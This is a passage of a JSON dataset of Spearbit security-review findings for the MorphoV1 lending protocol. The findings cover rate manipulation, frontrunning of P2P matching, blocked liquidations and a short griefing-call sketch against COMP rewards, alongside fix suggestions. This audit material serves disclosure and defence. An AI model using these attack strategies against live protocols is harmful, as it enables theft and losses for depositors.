borrow will fail and the position can also not be liquidated. The withdrawals could fail.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "P2P borrowers' rate can be reduced", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Users on the pool currently earn a much worse rate than users with P2P credit lines. There's a queue for being connected P2P. As this queue could not be fully processed in a single transaction the protocol introduces the concept of a max iteration count and a borrower/supplier \"delta\" (c.f. yellow paper). This delta leads to a worse rate for existing P2P users. An attacker can force a delta to be introduced, leading to worse rates than before. Example: Imagine some borrowers are matched P2P (earning a low borrow rate), and many are still on the pool and therefore in the pool queue (earning a worse borrow rate from Aave). An attacker supplies a huge amount, creating a P2P credit line for every borrower. (They can repeat this step several times if the max iterations limit is reached.) 7 The attacker immediately withdraws the supplied amount again. The protocol now attempts to demote the borrowers and reconnect them to the pool. But the algorithm performs a \"hard withdraw\" as the last step if it reaches the max iteration limit, creating a borrower delta. These are funds borrowed from the pool (at a higher borrowing rate) that are still wrongly recorded to be in a P2P position for some borrowers. This increase in borrowing rate is socialized equally among all P2P borrowers. (reflected in an updated p2pBorrowRate as the shareOfDelta increased.) 
The initial P2P borrowers earn a worse rate than before. If the borrower delta is large, it's close to the on-pool rate. If an attacker-controlled borrower account was newly matched P2P and not properly reconnected to the pool (in the \"demote borrowers\" step of the algorithm), they will earn a better P2P rate than the on-pool rate they earned before.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk Original" + ] + }, + { + "title": "Frontrunners can exploit system by not allowing head of DLL to match in P2P", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "For a given asset x, liquidity is supplied on the pool since there are not enough borrowers. suppli- ersOnPool head: 0xa with 1000 units of x whenever there is a new transaction in the mempool to borrow 100 units of x, Frontrunner supplies 1001 units of x and is supplied on pool. updateSuppliers will put the frontrunner on the head (assuming very high gas is supplied). Borrower's transaction lands and is matched 100 units of x with a frontrunner in p2p. Frontrunner withdraws the remaining 901 left which was on the underlying pool. Favorable conditions for an attack: Relatively fewer gas fees & relatively high block gas limit. insertSorted is able to traverse to head within block gas limit (i.e length of DLL). Since this is a non-atomic sandwich, the frontrunner needs excessive capital for a block's time period.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "Differences between Morpho and Compound borrow validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between them; Compound has a mechanism to prevent borrows if the new borrowed amount would go above the current borrowCaps[cToken] threshold. Morpho does not check this threshold and could allow users to borrow on the P2P side (avoiding the revert because it would not trigger the underlying compound borrow action). Morpho should anyway monitor the borrowCaps of the market because it could make increaseP2PDeltasLogic and _unsafeWithdrawLogic reverts. Both Morpho and Compound do not check if a market is in \"deprecated\" state. This means that as soon as a user borrows some tokens, he/she can be instantly liquidated by another user. If the flag is true on Compound, the Morpho User can be liquidated directly on compound. If the flag is true on Morpho, the borrower can be liquidated on Morpho. Morpho does not check if borrowGuardianPaused[cToken] on Compound, a user could be able to borrow in P2P while the cToken market has borrow paused. More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Compound\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "Users can continue to borrow from a deprecated market", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "When a market is being marked as deprecated, there is no verification that the borrow for that market has already been disabled. 
This means a user could borrow from this market and immediately be eligible to be liquidated.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "ERC20 with transfer's fee are not handled by *PositionManager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Some ERC20 tokens could have fees attached to the transfer event, while others could enable them in the future (see USDT, USDC). The current implementation of both PositionManagers (for Aave and Compound) is not taking these types of ERC20 tokens into consideration. While Aave seems not to take this behavior into consideration (see LendingPool.sol), Compound, on the other hand, is explicitly handling it inside the doTransferIn function. Morpho is taking for granted that the amount specified by the user will be the amount transferred to the contract's balance, while in reality the contract will receive less. In supplyLogic, for example, Morpho will account for the user's p2p/pool balance for the full amount but will repay/supply to the pool less than the amount accounted for. (A sketch of the balance-delta pattern used by doTransferIn is given below.)", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "Cannot liquidate Morpho users if no liquidity on the pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Morpho implements liquidations by repaying the borrowed asset and then withdrawing the collateral asset from the underlying protocol (Aave / Compound). If there is no liquidity in the collateral asset pool, the liquidation will fail. Morpho could incur bad debt as they cannot liquidate the user. The liquidation mechanisms of Aave and Compound work differently: they allow the liquidator to seize the debtor's aTokens/cTokens, which can later be withdrawn for the underlying token once there is enough liquidity in the pool. Technically, an attacker could even force no liquidity on the pool by frontrunning liquidations and borrowing the entire pool amount - preventing them from being liquidated on Morpho. However, this would require significant capital as collateral in most cases.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "Supplying and borrowing can recreate p2p credit lines even if p2p is disabled", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "When supplying/borrowing, the algorithm tries to reduce the deltas p2pBorrowDelta/p2pSupplyDelta by moving borrowers/suppliers back to P2P. It is not checked whether P2P is enabled. This has some consequences related to when governance disables P2P and wants to put users and liquidity back on the pool through increaseDelta calls. The users could enter P2P again by supplying and borrowing.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "In Compound implementation, P2P indexes can be stale", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The current implementation of MorphoUtils._isLiquidatable loops through all of the tokens the user has supplied to/borrowed from. The scope of the function is to check whether the user can be liquidated or not by verifying that debtValue > maxDebtValue.
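Referring back to the fee-on-transfer item above, a minimal sketch of the balance-delta pattern (the same idea Compound applies in doTransferIn); Solmate's SafeTransferLib is assumed to be available:

    using SafeTransferLib for ERC20;

    function _transferIn(ERC20 _token, uint256 _amount) internal returns (uint256 received) {
        uint256 balanceBefore = _token.balanceOf(address(this));
        _token.safeTransferFrom(msg.sender, address(this), _amount);
        // credit the user with what was actually received rather than with _amount,
        // so fee-on-transfer tokens cannot desynchronize the internal accounting
        received = _token.balanceOf(address(this)) - balanceBefore;
    }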
Resolving \"Compound liquidity computation uses outdated cached borrowIndex\" implies that the Compound borrow index used is always up-to-date, but the P2P indexes associated with the token could still be out of date if the market has not been used recently and the underlying Compound indexes (on which the P2P indexes are based) have changed a lot. As a consequence, all the functions that rely on _isLiquidatable (liquidate, withdraw, borrow) could return a wrong result if the majority of the user's balance is on the P2P balance (the problem is even more aggravated without resolving \"Compound liquidity computation uses outdated cached borrowIndex\"). Let's say, for example: Alice supplies ETH in pool; Alice supplies BAT in P2P; Alice borrows some DAI. At some point in time the ETH value goes down, but the interest rate of BAT goes up. If the P2P index of BAT had been correctly up-to-date, Alice would still have been solvent, but she gets liquidated by Bob who calls liquidate(alice, ETH, DAI). Even by fixing \"Compound liquidity computation uses outdated cached borrowIndex\", Alice would still be liquidated because her entire collateral is on P2P and not in the pool.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "Turning off an asset as collateral on Morpho-Aave still allows seizing of that collateral on Morpho and leads to liquidations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho Aave deployment can set the asset to not be used as collateral for Aave's Morpho contract position. On Aave, this prevents liquidators from seizing this asset as collateral. 1. However, this prevention does not extend to users on Morpho, as Morpho has not implemented this check. Liquidations are performed through a repay & withdraw combination, and withdrawing the asset on Aave is still allowed. 2. When turning off the asset as collateral, the single Morpho contract position on Aave might still be over-collateralized, but some users on Morpho suddenly lose this asset as collateral (LTV becomes 0) and will be liquidated.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "claimToTreasury(COMP) steals users' COMP rewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The claimToTreasury function can send a market's underlying tokens that have been accumulated in the contract to the treasury. This is intended to be used for the reserve amounts that accumulate in the contract from P2P matches. However, Compound also pays out rewards in COMP, and COMP is a valid Compound market. Sending the COMP reserves will also send the COMP rewards. This is especially bad as anyone can claim COMP rewards on behalf of Morpho at any time and the rewards will be sent to the contract. An attacker could even frontrun a claimToTreasury(cCOMP) call with a Comptroller.claimComp(morpho, [cComp]) call to sabotage the reward system.
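To make the frontrun concrete, a sketch of the griefing call; Comptroller.claimComp(address, CToken[]) is Compound's public interface, while the claimToTreasury signature is assumed from context:

    // anyone can push Morpho's accrued COMP into the Morpho contract at any time
    CToken[] memory markets = new CToken[](1);
    markets[0] = CToken(cComp);
    comptroller.claimComp(address(morpho), markets);
    // the rewards now sit in the Morpho contract, so a subsequent owner call such as
    // claimToTreasury(cComp, amount) would sweep users' COMP together with the reserve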
Users won't be able to claim their rewards.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "Compound liquidity computation uses outdated cached borrowIndex", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The _isLiquidatable function iterates over all user-entered markets and calls _getUserLiquidityDataForAsset(poolToken) -> _getUserBorrowBalanceInOf(poolToken). However, it only updates the indexes of markets that correspond to the borrow and collateral assets. The _getUserBorrowBalanceInOf function computes the underlying pool amount of the user as userBorrowBalance.onPool.mul(lastPoolIndexes[_poolToken].lastBorrowPoolIndex);. Note that lastPoolIndexes[_poolToken].lastBorrowPoolIndex is a value that was cached by Morpho, and it can be outdated if there has not been a user interaction with that market for a long time. The liquidation does not match Compound's liquidation anymore, and users that could be liquidated on Compound might not be liquidatable on Morpho. Liquidators would first need to trigger updates to Morpho's internal borrow indexes.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "HeapOrdering.getNext returns the root node for nodes not in the list", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "If an id does not exist in the HeapOrdering, the getNext() function will return the root node: uint256 rank = _heap.ranks[_id]; // @audit returns 0 as rank; rank + 1 will be the root if (rank < _heap.accounts.length) return getAccount(_heap, rank + 1).id; else return address(0); (A fix is sketched below.)", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Low Risk" + ] + }, + { + "title": "Heap only supports balances up to type(uint96).max", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The current heap implementation packs an address and the balance into a single storage slot, which restricts the balance to the uint96 type with a max value of ~7.9e28. If a token has 18 decimals, the largest balance that can be stored will be about 7.9e10 whole tokens. This could lead to problems with a token of low value; for example, if 1.0 token is worth $0.0001, a user could only store about $7,900,000 worth.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Low Risk" + ] + }, + { + "title": "Delta leads to incorrect reward distributions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Delta describes the amount that is on the pool but still wrongly tracked as inP2P for some users. There are users that do not have their P2P balance updated to an equivalent pool balance and therefore do not earn rewards. There is now a mismatch of this delta between the pool balance that earns a reward and the sum of pool balances that are tracked in the reward manager to earn that reward.
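Referring back to the getNext snippet above, a minimal fix sketch: treat a zero rank as "not in the heap" and return address(0) explicitly (the struct and helper names follow the snippet):

    function getNext(HeapArray storage _heap, address _id) internal view returns (address) {
        uint256 rank = _heap.ranks[_id];
        if (rank == 0) return address(0); // _id is not in the heap
        if (rank < _heap.accounts.length) return getAccount(_heap, rank + 1).id;
        return address(0);
    }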
The increase in delta directly leads to an increase in rewards for all other users on the pool.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Low Risk" + ] + }, + { + "title": "When adding a new rewards manager, users already on the pool won't be earning rewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "When setting a new rewards manager, existing users that are already on the pool are not tracked and won't be earning rewards.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Low Risk" + ] + }, + { + "title": "liquidationThreshold computation can be moved for gas efficiency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The vars.liquidationThreshold computation is only relevant if the user is supplying this asset. Therefore, it can be moved to the if (_isSupplying(vars.userMarkets, vars.borrowMask)) branch.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Gas Optimization" + ] + }, + { + "title": "Add max approvals to markets upon market creation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Approvals to the Compound markets are set on each supplyToPool function call.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Gas Optimization" + ] + }, + { + "title": "isP2PDisabled flag is not updated by setIsPausedForAllMarkets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The current implementation of _setPauseStatus does not update isP2PDisabled. When _isPaused = true this is not a real problem: once all the pause flags are set (everything is paused), all the operations will be blocked at the root of the execution of the process. There might be cases instead where isP2PDisabled and the other flags were all set for a market and Morpho wants to clear all of them, resuming all the operations and allowing the users to continue P2P usage. In this case, Morpho would only resume operations without allowing the users to use the P2P flow. function _setPauseStatus(address _poolToken, bool _isPaused) internal { Types.MarketPauseStatus storage pause = marketPauseStatus[_poolToken]; pause.isSupplyPaused = _isPaused; pause.isBorrowPaused = _isPaused; pause.isWithdrawPaused = _isPaused; pause.isRepayPaused = _isPaused; pause.isLiquidateCollateralPaused = _isPaused; pause.isLiquidateBorrowPaused = _isPaused; // ... event emissions } (A sketch of keeping the P2P flag in sync is given below.)", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Aave liquidate validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic.
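Referring back to the _setPauseStatus snippet above, a hedged sketch of keeping the P2P flag in sync; whether setIsPausedForAllMarkets should touch isP2PDisabled at all is a governance design decision, so the extra line is illustrative only:

    function _setPauseStatus(address _poolToken, bool _isPaused) internal {
        Types.MarketPauseStatus storage pause = marketPauseStatus[_poolToken];
        pause.isSupplyPaused = _isPaused;
        pause.isBorrowPaused = _isPaused;
        pause.isWithdrawPaused = _isPaused;
        pause.isRepayPaused = _isPaused;
        pause.isLiquidateCollateralPaused = _isPaused;
        pause.isLiquidateBorrowPaused = _isPaused;
        pause.isP2PDisabled = _isPaused; // hypothetical: pause/resume P2P together with the rest
        // ... event emissions
    }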
By reviewing both logics, we have noticed that there are some differences between them. Note: Morpho re-implements the liquidate function as a mix of: repay + supply operations on Aave, executed inside _unsafeRepayLogic where needed; withdraw + borrow operations on Aave, executed inside _unsafeWithdrawLogic where needed. From _unsafeRepayLogic (repay + supply on pool where needed): Because _unsafeRepayLogic internally calls aave.supply, the whole tx could fail in case supplying has been disabled on Aave (isFrozen == true) for the _poolTokenBorrowed. Morpho is not checking that the Aave borrowAsset has isActive == true. Morpho does not check that remainingToRepay.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0; trying to repay that amount to Aave would make the whole tx revert. Morpho does not check that remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0; trying to supply that amount to Aave would make the whole tx revert. From _unsafeWithdrawLogic (withdraw + borrow on pool where needed): Because _unsafeWithdrawLogic internally calls aave.borrow, the whole tx could fail in case borrowing has been disabled on Aave (isFrozen == true or borrowingEnabled == false) for the _poolTokenCollateral. Morpho is not checking that the Aave collateralAsset has isActive == true. Morpho does not check that remainingToWithdraw.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0; trying to withdraw that amount from Aave would make the whole tx revert. Morpho does not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0; trying to borrow that amount from Aave would make the whole tx revert. More detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Aave repay validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logics, we have noticed that there are some differences between them. Note: Morpho re-implements the repay function as a mix of repay + supply operations on Aave where needed. Both Aave and Morpho are not handling ERC20 tokens with fees on transfer. Because _unsafeRepayLogic internally calls aave.supply, the whole tx could fail in case supplying has been disabled on Aave (isFrozen == true). Morpho is not checking that the Aave market has isActive == true. Morpho does not check that remainingToRepay.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0; trying to repay that amount to Aave would make the whole tx revert. Morpho does not check that remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0.
Trying to supply that amount to Aave would make the whole tx revert. More detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Aave withdraw validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logics, we have noticed that there are some differences between them. Note: Morpho re-implements the withdraw function as a mix of withdraw + borrow operations on Aave where needed. Both Aave and Morpho are not handling ERC20 tokens with fees on transfer. Because _unsafeWithdrawLogic internally calls aave.borrow, the whole tx could fail in case borrowing has been disabled on Aave (isFrozen == true or borrowingEnabled == false). Morpho is not checking that the Aave market has isActive == true. Morpho does not check that remainingToWithdraw.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0; trying to withdraw that amount from Aave would make the whole tx revert. Morpho does not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0; trying to borrow that amount from Aave would make the whole tx revert. Note 1: Aave is NOT checking that the market isFrozen. This means that users can withdraw even if the market is active but frozen. More detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Aave borrow validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logics, we have noticed that there are some differences between them. Note: Morpho re-implements the borrow function as a mix of withdraw + borrow operations on Aave where needed. Both Aave and Morpho are not handling ERC20 tokens with fees on transfer. Morpho is not checking that the Aave market has isFrozen == false (a check done by Aave on the borrow operation); users could be able to borrow in P2P even if borrowing is paused on Aave (isFrozen == true) because Morpho would only call aave.withdraw (where the frozen flag is not checked). Morpho does not check whether the market is active (would borrowingEnabled == false if the market is not active?). Morpho does not check whether the market is frozen (would borrowingEnabled == false if the market is not frozen?). Morpho does not check that healthFactor > GenericLogic.HEALTH_FACTOR_LIQUIDATION_THRESHOLD. Morpho does not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0.
Trying to borrow that amount from Aave would make the whole tx revert. More detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Aave supply validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logics, we have noticed that there are some differences between them. Note: Morpho re-implements the supply function as a mix of repay + supply operations on Aave where needed. Both Aave and Morpho are not handling ERC20 tokens with fees on transfer. Morpho is not checking that the Aave market has isFrozen == false; users could be able to supply in P2P even if supplying is paused on Aave (isFrozen == true) because Morpho would only call aave.repay (where the frozen flag is not checked). Morpho is not checking if remainingToSupply.rayDiv( poolIndexes[_poolToken].poolSupplyIndex ) == 0; trying to supply that amount to Aave would make the whole tx revert. More detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Aave\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Morpho should avoid creating a new market when the underlying Aave market is frozen", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "In the current implementation of Aave MorphoGovernance.createMarket, the function is only checking if the AToken is in an active state. Morpho should also check that the AToken is not in a frozen state. When a market is frozen, many operations on the Aave side will be prevented (reverting the transaction).", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Compound liquidate validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. Note: Morpho liquidation does not directly call compound.liquidate but acts as a repay + withdraw operation. By reviewing both logics, we have noticed that there are some differences between them. Morpho does not check Compound's seizeGuardianPaused because it is not implementing a \"real\" liquidate on Compound, but is emulating it as a \"repay\" + \"withdraw\". Morpho should anyway monitor off-chain when the value of seizeGuardianPaused changes to true. Which are the scenarios for which Compound decides to block liquidations (across all cTokens)? When this happens, is Compound also pausing all the other operations? [Open question] Should Morpho pause liquidations when seizeGuardianPaused is true?
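A recurring theme in the Aave difference items above is a scaled amount that rounds down to zero. A minimal sketch of the kind of guard they suggest, with illustrative names, is to touch the pool only when the scaled amount is non-zero:

    // skip pool interactions whose scaled amount rounds down to zero instead of
    // letting the Aave call revert deep inside the pool
    uint256 scaledSupply = remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex);
    if (scaledSupply > 0) _supplyToPool(_poolToken, remainingToSupply); // _supplyToPool is hypothetical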
Morpho is not reverting if msg.sender == borrower. Morpho does not check if _amount > 0. Compound reverts if amountToSeize > userCollateralBalance; Morpho does not revert and instead uses min(amountToSeize, userCollateralBalance). More detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Compound\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "repayLogic in Compound PositionsManager should revert if toRepay is equal to zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The current implementation of repayLogic is correctly reverting if _amount == 0 but is not reverting if toRepay == 0. The value inside toRepay is given by the min value between _getUserBorrowBalanceInOf(_poolToken, _onBehalf) and _amount. If the _onBehalf user has zero debt, toRepay will be initialized with zero. (A sketch of the suggested guard is given below.)", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Differences between Morpho and Compound supply validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logics, we have noticed that there are some differences between them: Compound is handling ERC20 tokens that could have transfer fees; Morpho is not doing it right now, see \"ERC20 with transfer's fee are not handled by *PositionManager\". Morpho is not checking if the underlying Compound market has been paused for the supply action (see mintGuardianPaused[token]). This means that even if the Compound supply is paused, Morpho could allow users to supply in P2P. Morpho is not checking if the market on both Morpho and Compound has been deprecated. If the deprecation flag is intended to be true for a market that will be removed in the near future, Morpho probably should not allow users to provide collateral for such a market. More detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Compound\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Consider creating a documentation that covers all the Morpho own flags, lending protocol's flags and how they interact/override each other", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Both Morpho and Aave/Compound have their own flags to check before allowing a user to interact with the protocols. Usually, Morpho has decided to follow the logic to map 1:1 the implementation of the underlying protocol validation.
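Referring back to the repayLogic item above, a minimal sketch of the suggested guard; the error name follows Morpho's custom-error style but is illustrative:

    if (_amount == 0) revert AmountIsZero();
    uint256 toRepay = Math.min(_getUserBorrowBalanceInOf(_poolToken, _onBehalf), _amount);
    if (toRepay == 0) revert AmountIsZero(); // hypothetical: _onBehalf has no debt on this market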
There are also some examples where Morpho has decided to override some of its own internal flags. For example, in the Aave aave-v2/ExitPositionsManager.liquidateLogic, even if a Morpho market has been flagged as \"deprecated\" (a user can be liquidated without being insolvent), the liquidator would not be able to liquidate the user if the liquidation logic has been paused.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Missing natspec or typos in natspec", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "- Updated the natspec of updateP2PIndexes replacing \"exchangeRatesStored()\" with \"exchangeRateStored()\" - Updated the natspec of _updateP2PIndexes replacing \"exchangeRatesStored()\" with \"exchangeRateStored()\" - Updated the natspec for event MarketCreated replacing \"_poolToken\" with \"_p2pIndexCursor\"", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Removed unused \"named\" return parameters from functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Some functions in the codebase define \"named\" return parameters that are not used explicitly inside the code. This could lead future changes to return wrong values if the \"explicit return\" statement is removed and the function returns the \"default\" values (based on the variable type) of the \"named\" parameters.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Consider merging the code of CompoundMath libraries and use only one", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The current codebase uses libraries/CompoundMath.sol, but there's already an existing Solidity library with the same name inside the package @morpho-dao/morpho-utils. For better code clarity, consider merging those two libraries and only importing the one from the external package. Be aware that the mul and div functions in the @morpho-dao/morpho-utils CompoundMath implementation use low-level Yul and should be tested, while the library used right now in the code uses \"high level\" Solidity.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Consider reverting the creation of a deprecated market in Compound", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Compound has a mechanism that allows the Governance to set a specific market as \"deprecated\". Once a market is deprecated, all the borrows can be liquidated without checking whether the user is solvent or not. Compound currently allows users to enter (to supply and borrow) such a market. In the current version of MorphoGovernance.createMarket, Morpho governance is not checking whether a market is already deprecated on Compound before entering it and creating a new Morpho market. This would allow a Morpho user to possibly supply or borrow on a market that has already been deprecated by Compound.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Document HeapOrdering", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Morpho uses a non-standard Heap implementation for their Aave P2P matching engine.
The implementation only correctly sorts _maxSortedUsers / 2 instead of the expected _maxSortedUsers. Once the _maxSortedUsers is reached, it halves the size of the heap, cutting off the last level of leaves of the heap. This is done because a naive implementation that would insert new values at _maxSortedUsers (once the heap is full) and shift them up, then decrease the size to _maxSortedUsers - 1 again, would end up concentrating all new values on the same single path from the leaf to the root node. Cutting off the last level of nodes of the heap is a heuristic to remove low-value nodes (because of the heap property) while at the same time letting new values be shifted up from different leaf locations. In the end, the goal this tries to achieve is that more high-value nodes are stored in the heap and can be used for the matching engine.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Consider removing the Aave-v2 reward management logic if it is not used anymore", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "If the current aave-v2 reward program has ended and the Aave protocol is not re-introducing it anytime soon (if not at all), consider removing the code that currently handles all the logic behind claiming rewards from the Aave lending pool for the supplied/borrowed assets. Removing that code would make the codebase cleaner, reduce the attack surface and avoid possible reverts in case some of the state variables are incorrectly configured (rewards management on Morpho is activated but Aave is not distributing rewards anymore).", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": 